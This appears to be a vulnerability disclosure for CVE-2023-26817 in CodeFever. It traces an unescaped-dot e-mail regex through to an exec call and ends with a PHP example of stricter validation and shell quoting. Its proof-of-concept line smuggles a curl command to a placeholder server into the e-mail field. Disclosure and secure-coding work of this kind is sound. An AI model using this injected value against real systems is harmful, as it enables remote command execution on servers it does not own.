Headline
CVE-2023-26817: Codefever before 2023.2.7-b1c2e7f has a Remote Command Execution Vulnerability · Issue #140 · PGYER/codefever
codefever before 2023.2.7-commit-b1c2e7f was discovered to contain a remote code execution (RCE) vulnerability via the component /controllers/api/user.php.
List of vulnerable paths
Vulnerable path /application/controllers/api/user.php
Vulnerable path /application/libraries/service/Network/Request.php
The process of code audit
The $email value comes from Request::parse().
Lines 44-56 of “Request.php” show us that we can input any data.
Lines 294-295 of “user.php” use a vulnerable regular expression: because there is no backslash in front of the dot, the dot can match any character.
Then the email is passed into EmailSender::send().
Let us check the function.
We can exploit the “exec” call in that function to achieve remote code execution.
Vulnerability exploitation process:
Register and log in.
Input the POC.
We can check ‘result.txt’ and decode it.
POC code:
[email protected]’xx|curl test.server.com;xx’xx
Your exp should be in test.server.com. We can execute any remote command.
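The validation flaw described in the code audit above, shown beside a hardened check. This is an added example and is not CodeFever's code: the two regular expressions, the function names, the HYPOTHETICAL_MAIL_HELPER placeholder and the sample inputs are assumptions constructed for illustration.

```php
<?php
// Added illustration: the patterns, helper name and function names below are
// hypothetical and are not taken from CodeFever's source.

// Loose pattern: the dot inside the repeated group is unescaped, so it
// matches any character, including quotes, pipes, spaces and semicolons.
const LOOSE_EMAIL = '/^[A-Za-z0-9_-]+@[A-Za-z0-9_-]+(.[A-Za-z0-9_-]+)+$/';

// Strict pattern: dot escaped, anchored with \A and \z, allowlisted characters only.
const STRICT_EMAIL = '/\A[A-Za-z0-9._+-]{1,64}@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+\z/';

function matchesPattern(string $pattern, string $value): bool
{
    return preg_match($pattern, $value) === 1;
}

// Validate first, then quote the value for the shell anyway, so a later
// weakening of the pattern does not reopen the injection path.
function buildMailCommand(string $email): string
{
    if (!matchesPattern(STRICT_EMAIL, $email)) {
        throw new InvalidArgumentException('rejected e-mail address');
    }
    // HYPOTHETICAL_MAIL_HELPER stands in for whatever binary is invoked.
    return 'HYPOTHETICAL_MAIL_HELPER --to ' . escapeshellarg($email);
}

// Constructed test inputs (not real addresses).
$samples = [
    'alice@example.test',
    "alice@example.test'xx|echo marker;xx'xx",
];

foreach ($samples as $s) {
    printf("%-42s loose=%s strict=%s\n", $s,
        var_export(matchesPattern(LOOSE_EMAIL, $s), true),
        var_export(matchesPattern(STRICT_EMAIL, $s), true));
    try {
        echo '  command: ', buildMailCommand($s), "\n";
    } catch (InvalidArgumentException $e) {
        echo '  refused: ', $e->getMessage(), "\n";
    }
}
```

The second sample passes the loose pattern because every shell metacharacter is consumed by the unescaped dot, while the strict pattern refuses it before any command string is built.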